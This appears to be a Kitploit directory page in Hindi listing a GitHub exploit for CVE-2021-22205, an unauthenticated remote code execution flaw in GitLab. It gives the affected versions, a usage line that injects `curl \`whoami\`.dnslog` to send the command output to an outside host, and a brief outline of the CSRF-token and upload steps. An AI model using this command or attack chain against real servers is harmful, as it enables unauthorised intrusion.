Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-22205 — CVE-2021-22205 अनधिकृत RCE | Kitploit
उपकरण/GitHubGitHub/r0exper/cve-2021-22205
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubr0exper/cve-2021-22205

CVE-2021-22205

CVE-2021-22205 अनधिकृत RCE

रिपॉजिटरी देखें
692724 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-22205

प्रभावित संस्करण:

  • Gitlab CE/EE < 13.10.3
  • Gitlab CE/EE < 13.9.6
  • Gitlab CE/EE < 13.8.8

उपयोग

root@kitploit:~
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

Xnip2021-10-28_21-54-04

csrf-टोकन प्राप्त करें:

Xnip2021-10-28_21-44-31

/users/sign_in के माध्यम से csrf-टोकन प्राप्त करें, फिर पिछले CVE-2021-22205 poc का उपयोग करके अनधिकृत अपलोड अनुरोध निष्पादित करने के लिए अपलोड पैकेज बनाएं, अंततः rce प्राप्त करें।

Xnip2021-10-28_21-43-13

संदर्भ:

  • https://hackerone.com/reports/1154542
  • https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
  • https://forum.ywhack.com/viewthread.php?tid=115611
  • https://forum.ywhack.com/viewthread.php?tid=116706
  • https://github.com/RedTeamWing/CVE-2021-22205
  • टूल डाउनलोड करें